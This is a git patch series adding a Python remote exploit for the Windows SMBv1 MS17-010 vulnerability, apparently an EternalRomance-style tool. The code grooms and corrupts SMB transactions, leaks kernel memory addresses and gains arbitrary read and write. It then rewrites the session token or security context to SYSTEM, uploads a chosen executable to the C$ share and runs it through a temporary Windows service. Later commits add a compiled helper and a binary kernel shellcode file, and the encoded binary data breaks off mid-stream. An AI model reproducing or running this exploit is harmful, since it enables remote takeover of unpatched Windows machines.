+	
+	if 'arch' in info:
+		# add os and arch specific exploit info
+		info.update(OS_ARCH_INFO[info['os']][info['arch']])
+		attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
+	else:
+		# do not know target architecture
+		# this case is only for Windows 2003
+		# try offset of 64 bit then 32 bit because no target architecture
+		attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
+	
+	# ================================
+	# groom packets
+	# ================================
+	# sum of transaction name, parameters and data length is 0x1000
+	# paramterCount = 0x100-TRANS_NAME_LEN
+	print('Groom packets')
+	trans_param = pack('<HH', info['fid'], 0)
+	for i in range(12):
+		mid = info['fid'] if i == 8 else next_extra_mid()
+		conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)	
+	
+	# expected transactions alignment
+	#
+	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
+	#    |  mid=mid1 |  mid=mid2 |             |  mid=mid8 |  mid=fid  |  mid=mid9 | mid=mid10 | mid=mid11 |
+	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
+	#                                                         trans1       trans2
+
+	# ================================
+	# shift transaction Indata ptr with SmbWriteAndX
+	# ================================
+	shift_indata_byte = 0x200
+	conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
+	
+	# ================================
+	# Dangerous operation: attempt to control one transaction
+	# ================================
+	# Note: POOL_ALIGN value is same as heap alignment value
+	success = False
+	for tinfo in attempt_list:
+		print('attempt controlling next transaction on ' + tinfo['ARCH'])
+		HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
+		NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
+
+		# Below operation is dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
+		conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
+		wait_for_request_processed(conn)
+
+		# if the overwritten is correct, a modified transaction mid should be special_mid now.
+		# a new transaction with special_mid should be error.
+		recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
+		if recvPkt.getNTStatus() == 0x10002:  # invalid SMB
+			print('success controlling one transaction')
+			success = True
+			if 'arch' not in info:
+				print('Target is '+tinfo['ARCH'])
+				info['arch'] = tinfo['ARCH']
+				info.update(OS_ARCH_INFO[info['os']][info['arch']])
+			break
+		if recvPkt.getNTStatus() != 0:
+			print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
+	
+	if not success:
+		print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
+		print('!!! Write to wrong place !!!')
+		print('the target might be crashed')
+		return False
+
+
+	# NSA eternalromance modify transaction RefCount to keep controlled and reuse transaction after leaking info.
+	# This is easy to to but the modified transaction will never be freed. The next exploit attempt might be harder
+	#   because of this unfreed memory chunk. I will avoid it.
+	
+	# From a picture above, now we can only control trans2 by trans1 data. Also we know only offset of these two 
+	# transactions (do not know the address).
+	# After reading memory by modifying and completing trans2, trans2 cannot be used anymore.
+	# To be able to use trans1 after trans2 is gone, we need to modify trans1 to be able to modify itself.
+	# To be able to modify trans1 struct, we need to use trans2 param or data but write backward.
+	# On 32 bit target, we can write to any address if parameter count is 0xffffffff.
+	# On 64 bit target, modifying paramter count is not enough because address size is 64 bit. Because our transactions
+	#   are allocated with RtlAllocateHeap(), the HIDWORD of InParameter is always 0. To be able to write backward with offset only,
+	#   we also modify HIDWORD of InParameter to 0xffffffff.
+	
+	print('modify parameter count to 0xffffffff to be able to write backward')
+	conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
+	# on 64 bit, modify InParameter last 4 bytes to \xff\xff\xff\xff too
+	if info['arch'] == 'x64':
+		conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
+	wait_for_request_processed(conn)
+	
+	TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
+	PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
+	PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT
+
+	# modify paramterCount of first transaction
+	conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
+	if info['arch'] == 'x64':
+		conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
+		# restore trans2.InParameters pointer before leaking next transaction
+		conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
+	wait_for_request_processed(conn)
+
+	# ================================
+	# leak transaction
+	# ================================
+	print('leak next transaction')
+	# modify TRANSACTION member to leak info
+	# function=5 (NT_TRANS_RENAME)
+	conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
+	# parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
+	conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])
+
+	conn.send_nt_trans_secondary(mid=special_mid)
+	leakData = conn.recv_transaction_data(special_mid, 0x100)
+	leakData = leakData[4:]  # remove param
+	#open('leak.dat', 'wb').write(leakData)
+
+	# check heap chunk size value in leak data
+	if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
+		print('chunk size is wrong')
+		return False
+
+	# extract leak transaction data and make next transaction to be trans2
+	leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
+	leakTrans = leakData[leakTranOffset:]
+	fmt = info['PTR_FMT']
+	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
+	inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
+	trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
+	
+	print('CONNECTION: 0x{:x}'.format(connection_addr))
+	print('SESSION: 0x{:x}'.format(session_addr))
+	print('FLINK: 0x{:x}'.format(flink_value))
+	print('InData: 0x{:x}'.format(indata_value))
+	print('MID: 0x{:x}'.format(trans2_mid))
+	
+	trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
+	trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
+	print('TRANS1: 0x{:x}'.format(trans1_addr))
+	print('TRANS2: 0x{:x}'.format(trans2_addr))
+	
+	# ================================
+	# modify trans struct to be used for arbitrary read/write
+	# ================================
+	print('modify transaction struct for arbitrary read/write')
+	# modify
+	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
+	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
+	# Note: HIDWORD of trans1.InParameter is still 0xffffffff
+	TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
+	conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
+	wait_for_request_processed(conn)
+	
+	# modify trans1.mid
+	trans1_mid = conn.next_mid()
+	conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
+	wait_for_request_processed(conn)
+	
+	info.update({
+		'connection': connection_addr,
+		'session': session_addr,
+		'trans1_mid': trans1_mid,
+		'trans1_addr': trans1_addr,
+		'trans2_mid': trans2_mid,
+		'trans2_addr': trans2_addr,
+	})
+	return True
+
+def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):
+	SID_SYSTEM = pack('<BB5xB'+'I', 1, 1, 5, 18)
+	SID_ADMINISTRATORS = pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
+	SID_AUTHENICATED_USERS = pack('<BB5xB'+'I', 1, 1, 5, 11)
+	SID_EVERYONE = pack('<BB5xB'+'I', 1, 1, 1, 0)
+	# SID_SYSTEM and SID_ADMINISTRATORS must be added
+	sids = [ SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS ]
+	# - user has no attribute (0)
+	# - 0xe: SE_GROUP_OWNER | SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT
+	# - 0x7: SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_MANDATORY
+	attrs = [ 0, 0xe, 7, 7 ]
+	
+	# assume its space is enough for SID_SYSTEM and SID_ADMINISTRATORS (no check)
+	# fake user and groups will be in same buffer of original one
+	# so fake sids size must NOT be bigger than the original sids
+	fakeUserAndGroupCount = min(userAndGroupCount, 4)
+	fakeUserAndGroupsAddr = userAndGroupsAddr
+	
+	addr = fakeUserAndGroupsAddr + (fakeUserAndGroupCount * info['PTR_SIZE'] * 2)
+	fakeUserAndGroups = ''
+	for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):
+		fakeUserAndGroups += pack('<'+info['PTR_FMT']*2, addr, attr)
+		addr += len(sid)
+	fakeUserAndGroups += ''.join(sids[:fakeUserAndGroupCount])
+	
+	return fakeUserAndGroupCount, fakeUserAndGroups
+
+
+def exploit(target, port, pipe_name):
+	print('Trying to connect to %s:%d' % (target, port))
+	conn = MYSMB(target, port)
+	
+	# set NODELAY to make exploit much faster
+	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
+
+	info = {}
+
+	conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
+	server_os = conn.get_server_os()
+	print('Target OS: '+server_os)
+	if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
+		info['os'] = 'WIN7'
+		info['method'] = exploit_matched_pairs
+	elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10") or server_os.startswith("Windows RT 9200"):
+		info['os'] = 'WIN8'
+		info['method'] = exploit_matched_pairs
+	elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith('Windows Vista'):
+		info['os'] = 'WIN7'
+		info['method'] = exploit_fish_barrel
+	elif server_os.startswith("Windows Server 2003 "):
+		info['os'] = 'WIN2K3'
+		info['method'] = exploit_fish_barrel
+	elif server_os.startswith("Windows 5.1"):
+		info['os'] = 'WINXP'
+		info['arch'] = 'x86'
+		info['method'] = exploit_fish_barrel
+	elif server_os.startswith("Windows XP "):
+		info['os'] = 'WINXP'
+		info['arch'] = 'x64'
+		info['method'] = exploit_fish_barrel
+	elif server_os.startswith("Windows 5.0"):
+		info['os'] = 'WIN2K'
+		info['arch'] = 'x86'
+		info['method'] = exploit_fish_barrel
+	else:
+		print('This exploit does not support this target')
+		sys.exit()
+	
+	if pipe_name is None:
+		pipe_name = find_named_pipe(conn)
+		if pipe_name is None:
+			print('Not found accessible named pipe')
+			return False
+		print('Using named pipe: '+pipe_name)
+
+	if not info['method'](conn, pipe_name, info):
+		return False
+
+	# Now, read_data() and write_data() can be used for arbitrary read and write.
+	# ================================
+	# Modify this SMB session to be SYSTEM
+	# ================================	
+	fmt = info['PTR_FMT']
+	
+	print('make this SMB session to be SYSTEM')
+	# IsNullSession = 0, IsAdmin = 1
+	write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')
+
+	# read session struct to get SecurityContext address
+	sessionData = read_data(conn, info, info['session'], 0x100)
+	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
+
+	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
+		# Windows 2003 and earlier uses only ImpersonateSecurityContext() (with PCtxtHandle struct) for impersonation
+		# Modifying token seems to be difficult. But writing kernel shellcode for all old Windows versions is
+		# much more difficult because data offset in ETHREAD/EPROCESS is different between service pack.
+		
+		# find the token and modify it
+		if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
+			pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
+			pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
+		else:
+			pctxtDataAddr = secCtxAddr
+
+		tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
+		tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
+		print('current TOKEN addr: 0x{:x}'.format(tokenAddr))
+		
+		# copy Token data for restoration
+		tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
+		
+		# parse necessary data out of token
+		userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)
+
+		print('overwriting token UserAndGroups')
+		# modify UserAndGroups info
+		fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
+		if fakeUserAndGroupCount != userAndGroupCount:
+			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
+		write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
+	else:
+		# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
+		# copy SecurityContext for restoration
+		secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
+
+		print('overwriting session security context')
+		# see FAKE_SECCTX detail at top of the file
+		write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
+
+	# ================================
+	# do whatever we want as SYSTEM over this SMB connection
+	# ================================	
+	try:
+		send_and_execute(conn, info['arch'])
+	except:
+		pass
+
+	# restore SecurityContext/Token
+	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
+		userAndGroupsOffset = userAndGroupsAddr - tokenAddr
+		write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
+		if fakeUserAndGroupCount != userAndGroupCount:
+			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
+	else:
+		write_data(conn, info, secCtxAddr, secCtxData)
+
+	conn.disconnect_tree(conn.get_tid())
+	conn.logoff()
+	conn.get_socket().close()
+	return True
+
+def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset):
+	# struct _TOKEN:
+	#	...
+	#	ULONG UserAndGroupCount;                            // Ro: 4-Bytes
+	#	ULONG RestrictedSidCount;                           // Ro: 4-Bytes
+	# 	...
+	#	PSID_AND_ATTRIBUTES UserAndGroups;                  // Wr: sizeof(void*)
+	#	PSID_AND_ATTRIBUTES RestrictedSids;                 // Ro: sizeof(void*)
+	#	...
+
+	userAndGroupCount, RestrictedSidCount = unpack_from('<II', tokenData, userAndGroupCountOffset) 
+	userAndGroupsAddr, RestrictedSids = unpack_from('<'+info['PTR_FMT']*2, tokenData, userAndGroupsAddrOffset)
+
+	# RestrictedSidCount 	MUST be 0
+	# RestrictedSids 	MUST be NULL
+	#
+	# userandGroupCount 	must NOT be 0
+	# userandGroupsAddr 	must NOT be NULL
+	#
+	# Could also add a failure point here if userAndGroupCount >= x
+
+	success = True
+
+	if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0:
+		print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!')
+		print('RestrictedSids: 0x{:x}'.format(RestrictedSids))
+		print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount))
+		success = False
+
+	print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
+	print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
+
+	return success, userAndGroupCount, userAndGroupsAddr 
+
+def get_group_data_from_token(info, tokenData):
+	userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
+	userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET']
+
+	# try with default offsets
+	success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
+
+	# hack to fix XP SP0 and SP1
+	# I will avoid over-engineering a more elegant solution and leave this as a hack, 
+	# since XP SP0 and SP1 is the only edge case in a LOT of testing!
+	if not success and info['os'] == 'WINXP' and info['arch'] == 'x86':
+		print('Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround')
+
+		userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+		userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
+
+		# try with hack offsets
+		success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
+
+	# still no good. Abort because something is wrong
+	if not success:
+		print('Bad TOKEN_USER_GROUP offsets. Abort > BSOD')
+		sys.exit()
+
+	# token parsed and validated
+	return userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset
+
+def random_generator(size=6, chars=string.ascii_uppercase + string.digits):
+	return ''.join(random.choice(chars) for x in range(size))
+
+def send_and_execute(conn, arch):
+	smbConn = conn.get_smbconnection()
+
+	filename = "%s.exe" % random_generator(6)
+	print "Sending file %s..." % filename
+
+
+    #In some cases you should change remote file location
+    #For example:
+    #smb_send_file(smbConn, lfile, 'C', '/windows/temp/%s' % filename)
+	#service_exec(conn, r'cmd /c c:\windows\temp\%s' % filename)    
+	
+	smb_send_file(smbConn, lfile, 'C', '/%s' % filename)
+	service_exec(conn, r'cmd /c c:\%s' % filename)
+
+
+def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
+	with open(localSrc, 'rb') as fp:
+		smbConn.putFile(remoteDrive + '$', remotePath, fp.read)
+
+# based on impacket/examples/serviceinstall.py
+# Note: using Windows Service to execute command same as how psexec works
+def service_exec(conn, cmd):
+	import random
+	import string
+	from impacket.dcerpc.v5 import transport, srvs, scmr
+	
+	service_name = ''.join([random.choice(string.letters) for i in range(4)])
+
+	# Setup up a DCE SMBTransport with the connection already in place
+	rpcsvc = conn.get_dce_rpc('svcctl')
+	rpcsvc.connect()
+	rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
+	svcHandle = None
+	try:
+		print("Opening SVCManager on %s....." % conn.get_remote_host())
+		resp = scmr.hROpenSCManagerW(rpcsvc)
+		svcHandle = resp['lpScHandle']
+		
+		# First we try to open the service in case it exists. If it does, we remove it.
+		try:
+			resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
+		except Exception as e:
+			if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
+				raise e  # Unexpected error
+		else:
+			# It exists, remove it
+			scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
+			scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
+		os.path
+		print('Creating service %s.....' % service_name)
+		resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
+		serviceHandle = resp['lpServiceHandle']
+		
+		if serviceHandle:
+			# Start service
+			try:
+				print('Starting service %s.....' % service_name)
+				scmr.hRStartServiceW(rpcsvc, serviceHandle)
+				# is it really need to stop?
+				# using command line always makes starting service fail because SetServiceStatus() does not get called
+				#print('Stoping service %s.....' % service_name)
+				#scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
+			except Exception as e:
+				print(str(e))
+			
+			print('Removing service %s.....' % service_name)
+			scmr.hRDeleteService(rpcsvc, serviceHandle)
+			scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
+	except Exception as e:
+		print("ServiceExec Error on: %s" % conn.get_remote_host())
+		print(str(e))
+	finally:
+		if svcHandle:
+			scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
+
+	rpcsvc.disconnect()
+
+
+if len(sys.argv) < 2:
+	print("{} <ip> <executable_file> [port] [pipe_name]".format(sys.argv[0]))
+	sys.exit(1)
+
+target = sys.argv[1]
+lfile = sys.argv[2]
+port = 445
+pipe_name = None if len(sys.argv) < 4 else sys.argv[4]
+
+try:
+	if sys.argv[3] != '':
+		port = int(sys.argv[3])
+except:
+	pass
+
+if not os.path.isfile(lfile):
+    print("File not found %s" % lfile)
+    sys.exit(1)
+
+exploit(target, port, pipe_name)
+print('Done')
+

From 4620d350f26b2e88c76f1edfe7a1fe6ddcdf756d Mon Sep 17 00:00:00 2001
From: "Helvio Junior (M4v3r1cK)" <helvio_junior@hotmail.com>
Date: Tue, 7 Aug 2018 20:12:00 -0300
Subject: [PATCH 3/5] Corrention of named pipe index

---
 send_and_execute.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/send_and_execute.py b/send_and_execute.py
index f9e351c..de5d811 100644
--- a/send_and_execute.py
+++ b/send_and_execute.py
@@ -1062,7 +1062,7 @@ def service_exec(conn, cmd):
 target = sys.argv[1]
 lfile = sys.argv[2]
 port = 445
-pipe_name = None if len(sys.argv) < 4 else sys.argv[4]
+pipe_name = None if len(sys.argv) < 5 else sys.argv[4]
 
 try:
 	if sys.argv[3] != '':

From df661dae4bee231883b51d452a975d4174c428bc Mon Sep 17 00:00:00 2001
From: "Helvio Junior (M4v3r1cK)" <helvio_junior@hotmail.com>
Date: Sat, 18 Aug 2018 22:32:38 -0300
Subject: [PATCH 4/5] Correct on Send and Execute Module

---
 mysmb.pyc                            | Bin 0 -> 17253 bytes
 send_and_execute.py                  |   6 +++---
 shellcode/eternalblue_kshellcode_x86 | Bin 0 -> 638 bytes
 3 files changed, 3 insertions(+), 3 deletions(-)
 create mode 100644 mysmb.pyc
 create mode 100644 shellcode/eternalblue_kshellcode_x86

diff --git a/mysmb.pyc b/mysmb.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..633e8cc6333d916e10aed6a6084e3c709acbfc76
GIT binary patch
literal 17253
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
